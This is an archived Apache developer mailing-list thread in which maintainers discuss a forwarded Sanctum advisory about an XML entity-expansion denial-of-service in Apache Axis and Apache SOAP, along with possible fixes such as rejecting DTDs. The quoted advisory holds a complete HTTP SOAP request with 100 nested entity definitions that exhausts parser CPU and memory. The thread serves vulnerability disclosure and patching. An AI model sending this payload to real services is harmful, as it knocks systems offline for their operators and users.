I wonder if it might be possible to create our own SAX InputSource that
filters the incoming XML stream and throws an exception when it hits an XML
construct that is considered dangerous?
ADK
--------------------------------------------
There is no magic.
Scott Nichol
<snicholnews@scottn To: [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED]
ichol.com> cc:
Subject: Re: Fw: Security Alert -
Apache/Axis
27/11/2002 11:13
Please respond to
axis-dev
I notice that the Axis solution is brute force: refuse to process any
request with a DTD. Since Apache SOAP reads the envelope into a string
before parsing it to a DOM, a similarly brute-force approach would be to
refuse to process any envelope containing <!DOCTYPE. (If this were
intended to a valid part of parameter data, the < would be <.)
Scott Nichol
----- Original Message -----
From: "Sanjiva Weerawarana" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Tuesday, November 26, 2002 4:46 PM
Subject: Re: Fw: Security Alert - Apache/Axis
> Note that this vulnarability exists in Apache SOAP because we use
> the DOM parser and there's no way to shut turn off entity expansion
> AFAIK. The only solution would be to do some Xerces specific thing
> and lose the JAXP capability .. which would suck.
>
> Sanjiva.
>
> ----- Original Message -----
> From: "Dirk-Willem van Gulik" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Tuesday, November 26, 2002 4:27 PM
> Subject: Re: Fw: Security Alert - Apache/Axis
>
>
> >
> > Tom/Dims,
> >
> > Could you folks verify this and report back to [EMAIL PROTECTED]
that
> > each of those are 100% taken care of ?
> >
> > Then security@ can report back to the various constituencies, work
with
> > CERT if that is needed, etc. If you have any thoughds/statement
which need
> > to be added - make sure you add that.
> >
> > Dw
> >
> > On Tue, 26 Nov 2002, Davanum Srinivas wrote:
> >
> > > I think tom fixed it
> (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)
> > >
> > > Thanks,
> > > dims
> > >
> > > --- Ted Leung <[EMAIL PROTECTED]> wrote:
> > > > This security alert came through today.
> > > >
> > > > Ted
> > > > ----- Original Message -----
> > > > From: "Ian Holsman" <[EMAIL PROTECTED]>
> > > > To: <[EMAIL PROTECTED]>
> > > > Cc: "Ory Segal" <[EMAIL PROTECTED]>
> > > > Sent: Tuesday, November 26, 2002 8:02 AM
> > > > Subject: Security Alert - Apache/Axis
> > > >
> > > >
> > > > > Dear [EMAIL PROTECTED],
> > > > >
> > > > > During a recent security audit at one of our customers,
Sanctum
> found a
> > > > > security vulnerability in your product Apache/Axis.
> > > > > The details of this vulnerability are described in the
attached text
> file.
> > > > >
> > > > > We intend to issue a public advisory on BugTraq, SecuriTeam
and
> other site
> > > > > forums about this vulnerability the last week of November.
Please
> note,
> > > > the
> > > > > advisory will not contain specifics that might enable someone
to
> exploit
> > > > the
> > > > > vulnerability.
> > > > >
> > > > > We would appreciate it if you could issue a patch in that
timeline
> (i.e.
> > > > > around November 25th), so it can be linked to our advisory.
> > > > >
> > > > > Please feel free to contact me for more information/help.
> > > > >
> > > > > Thanks,
> > > > > -Amit
> > > > >
> > > > > <<XML_DTD_Axis.txt>>
> > > > >
> > > > >
> > > >
> > > >
> > >
>
> ----------------------------------------------------------------------
----
> --
> > > > ----
> > > >
> > > >
> > > >
>
> ---------------------------------------------------------------------
> > > > > To unsubscribe, e-mail: [EMAIL PROTECTED]
> > > > > For additional commands, e-mail: [EMAIL PROTECTED]
> > > > >
>
///////////////////////////////////////////////////////////////////////
> > > > ========================>> Security Advisory
> <<========================
> > > >
>
///////////////////////////////////////////////////////////////////////
> > > >
> > > >
> > > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> > > >
> > > > => Release date: 14/Nov/2002
> > > >
> > > > => Vendor: Apache Group
> > > >
> > > > The following product was found to be vulnerable:
> > > >
> > > > - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> > > >
> > > > The versions affected are the latest ones (as of October 2002).
> > > >
> > > > => Severity: High
> > > >
> > > > => CVE candidate: Not assigned yet.
> > > >
> > > > => Summary: Using the DTD part of the XML document, it is
possible to
> cause the
> > > > XML parser to consume 100% CPU and/or a lot of memory, therefore
> resulting in
> > > > a denial of service condition.
> > > >
> > > > => Description: The DTD part of the XML document enables the
document
> to define
> > > > named entities (other than the predefined <, >, etc.). The
> entities can be
> > > > defined using other entities (recursion is prohibited in XML
1.0).
> > > > Entities are expanded when they are referenced, inside the XML
> document.
> > > > The attack is comprised of defining and referencing an entity
which is
> defined
> > > > using two instances of another entity, which is (in turn)
defined as
> two instances
> > > > of yet another entity, and so on. This definition process can be
> repeated as long
> > > > as "necessary" - we found that nesting level of 100 is usually
> sufficient.
> > > > The 100th entity should be defined simply as a string. This has
the
> effect of having
> > > > the first entity contain, in theory, 2^99 (two to the power of
ninety
> nine)
> > > > concatenated values of the 100th entity.
> > > > Here's an example (the DTD is to be placed after the XML
declaration,
> and before the
> > > > root element of the XML document):
> > > >
> > > > <!DOCTYPE root [
> > > > <!ENTITY x100 "foobar">
> > > > <!ENTITY x99 "&x100;&x100;">
> > > > <!ENTITY x98 "&x99;&x99;">
> > > > <!ENTITY x97 "&x98;&x98;">
> > > > ...
> > > > <!ENTITY x3 "&x4;&x4;">
> > > > <!ENTITY x2 "&x3;&x3;">
> > > > <!ENTITY x1 "&x2;&x2;">
> > > > ]>
> > > >
> > > > Referring to the first entity inside a document that would
otherwise
> be accepted by
> > > > the application (using the syntax &x1;), results in a DoS
condition,
> due to the
> > > > excessive CPU load and/or memory load required by the XML parser
to
> expand this entity.
> > > >
> > > > => Solution: Not available yet.
> > > >
> > > > => Workaround: Not available yet.
> > > >
> > > > => Example:
> > > >
> > > > Ory Segal from Sanctum devised a SOAP request that manages to
mount
> this attack requiring
> > > > only a path to an existing web service to be known to the
attacker.
> > > >
> > > > The request is:
> > > >
> > > > POST path_to_web_service HTTP/1.0
> > > > Host: ...
> > > > Content-Type: text/xml
> > > > SOAPAction: ""
> > > > Content-Length: 3224
> > > >
> > > > <?xml version="1.0" ?>
> > > > <!DOCTYPE foobar [
> > > > <!ENTITY x0 "hello">
> > > > <!ENTITY x1 "&x0;&x0;">
> > > > <!ENTITY x2 "&x1;&x1;">
> > > > <!ENTITY x3 "&x2;&x2;">
> > > > <!ENTITY x4 "&x3;&x3;">
> > > > <!ENTITY x5 "&x4;&x4;">
> > > > <!ENTITY x6 "&x5;&x5;">
> > > > <!ENTITY x7 "&x6;&x6;">
> > > > <!ENTITY x8 "&x7;&x7;">
> > > > <!ENTITY x9 "&x8;&x8;">
> > > > <!ENTITY x10 "&x9;&x9;">
> > > > <!ENTITY x11 "&x10;&x10;">
> > > > <!ENTITY x12 "&x11;&x11;">
> > > > <!ENTITY x13 "&x12;&x12;">
> > > > <!ENTITY x14 "&x13;&x13;">
> > > > <!ENTITY x15 "&x14;&x14;">
> > > > <!ENTITY x16 "&x15;&x15;">
> > > > <!ENTITY x17 "&x16;&x16;">
> > > > <!ENTITY x18 "&x17;&x17;">
> > > > <!ENTITY x19 "&x18;&x18;">
> > > > <!ENTITY x20 "&x19;&x19;">
> > > > <!ENTITY x21 "&x20;&x20;">
> > > > <!ENTITY x22 "&x21;&x21;">
> > > > <!ENTITY x23 "&x22;&x22;">
> > > > <!ENTITY x24 "&x23;&x23;">
> > > > <!ENTITY x25 "&x24;&x24;">
> > > > <!ENTITY x26 "&x25;&x25;">
> > > > <!ENTITY x27 "&x26;&x26;">
> > > > <!ENTITY x28 "&x27;&x27;">
> > > > <!ENTITY x29 "&x28;&x28;">
> > > > <!ENTITY x30 "&x29;&x29;">
> > > > <!ENTITY x31 "&x30;&x30;">
> > > > <!ENTITY x32 "&x31;&x31;">
> > > > <!ENTITY x33 "&x32;&x32;">
> > > > <!ENTITY x34 "&x33;&x33;">
> > > > <!ENTITY x35 "&x34;&x34;">
> > > > <!ENTITY x36 "&x35;&x35;">
> > > > <!ENTITY x37 "&x36;&x36;">
> > > > <!ENTITY x38 "&x37;&x37;">
> > > > <!ENTITY x39 "&x38;&x38;">
> > > > <!ENTITY x40 "&x39;&x39;">
> > > > <!ENTITY x41 "&x40;&x40;">
> > > > <!ENTITY x42 "&x41;&x41;">
> > > > <!ENTITY x43 "&x42;&x42;">
> > > > <!ENTITY x44 "&x43;&x43;">
> > > > <!ENTITY x45 "&x44;&x44;">
> > > > <!ENTITY x46 "&x45;&x45;">
> > > > <!ENTITY x47 "&x46;&x46;">
> > > > <!ENTITY x48 "&x47;&x47;">
> > > > <!ENTITY x49 "&x48;&x48;">
> > > > <!ENTITY x50 "&x49;&x49;">
> > > > <!ENTITY x51 "&x50;&x50;">
> > > > <!ENTITY x52 "&x51;&x51;">
> > > > <!ENTITY x53 "&x52;&x52;">
> > > > <!ENTITY x54 "&x53;&x53;">
> > > > <!ENTITY x55 "&x54;&x54;">
> > > > <!ENTITY x56 "&x55;&x55;">
> > > > <!ENTITY x57 "&x56;&x56;">
> > > > <!ENTITY x58 "&x57;&x57;">
> > > > <!ENTITY x59 "&x58;&x58;">
> > > > <!ENTITY x60 "&x59;&x59;">
> > > > <!ENTITY x61 "&x60;&x60;">
> > > > <!ENTITY x62 "&x61;&x61;">
> > > > <!ENTITY x63 "&x62;&x62;">
> > > > <!ENTITY x64 "&x63;&x63;">
> > > > <!ENTITY x65 "&x64;&x64;">
> > > > <!ENTITY x66 "&x65;&x65;">
> > > > <!ENTITY x67 "&x66;&x66;">
> > > > <!ENTITY x68 "&x67;&x67;">
> > > > <!ENTITY x69 "&x68;&x68;">
> > > > <!ENTITY x70 "&x69;&x69;">
> > > > <!ENTITY x71 "&x70;&x70;">
> > > > <!ENTITY x72 "&x71;&x71;">
> > > > <!ENTITY x73 "&x72;&x72;">
> > > > <!ENTITY x74 "&x73;&x73;">
> > > > <!ENTITY x75 "&x74;&x74;">
> > > > <!ENTITY x76 "&x75;&x75;">
> > > > <!ENTITY x77 "&x76;&x76;">
> > > > <!ENTITY x78 "&x77;&x77;">
> > > > <!ENTITY x79 "&x78;&x78;">
> > > > <!ENTITY x80 "&x79;&x79;">
> > > > <!ENTITY x81 "&x80;&x80;">
> > > > <!ENTITY x82 "&x81;&x81;">
> > > > <!ENTITY x83 "&x82;&x82;">
> > > > <!ENTITY x84 "&x83;&x83;">
> > > > <!ENTITY x85 "&x84;&x84;">
> > > > <!ENTITY x86 "&x85;&x85;">
> > > > <!ENTITY x87 "&x86;&x86;">
> > > > <!ENTITY x88 "&x87;&x87;">
> > > > <!ENTITY x89 "&x88;&x88;">
> > > > <!ENTITY x90 "&x89;&x89;">
> > > > <!ENTITY x91 "&x90;&x90;">
> > > > <!ENTITY x92 "&x91;&x91;">
> > > > <!ENTITY x93 "&x92;&x92;">
> > > > <!ENTITY x94 "&x93;&x93;">
> > > > <!ENTITY x95 "&x94;&x94;">
> > > > <!ENTITY x96 "&x95;&x95;">
> > > > <!ENTITY x97 "&x96;&x96;">
> > > > <!ENTITY x98 "&x97;&x97;">
> > > > <!ENTITY x99 "&x98;&x98;">
> > > > <!ENTITY x100 "&x99;&x99;">
> > > > ]>
> > > > <SOAP-ENV:Envelope
> xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/";
> > > > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance";
> > > > xmlns:xsd="http://www.w3.org/1999/XMLSchema";>
> > > > <SOAP-ENV:Body>
> > > > <ns1:aaa xmlns:ns1="urn:aaa"
> SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/";>
> > > > <foobar xsi:type="xsd:string">&x100;</foobar>
> > > > </ns1:aaa>
> > > > </SOAP-ENV:Body>
> > > > </SOAP-ENV:Envelope>
> > > >
> > > >
> > >
> > >
> > > =====
> > > Davanum Srinivas - http://xml.apache.org/~dims/
> > >
> > > __________________________________________________
> > > Do you Yahoo!?
> > > Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> > > http://mailplus.yahoo.com
> > >
> >
> ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: [EMAIL PROTECTED]
> > > For additional commands, e-mail: [EMAIL PROTECTED]
> > >
> > >
>
>
-----------------------------------------------------------------------------------------------
Have you seen our website?.... http://www.vodafone.co.nz
CAUTION: This correspondence is confidential and intended for the named recipient(s)
only.
If you are not the named recipient and receive this correspondence in error, you must
not copy,
distribute or take any action in reliance on it and you should delete it from your
system and
notify the sender immediately. Thank you.
Unless otherwise stated, any views or opinions expressed are solely those of the
author and do
not represent those of Vodafone New Zealand Limited.
Vodafone New Zealand Limited
21 Pitt Street, Private Bag 92161, Auckland, 1020, New Zealand
Telephone + 64 9 357 5100
Facsimile + 64 9 377 0962
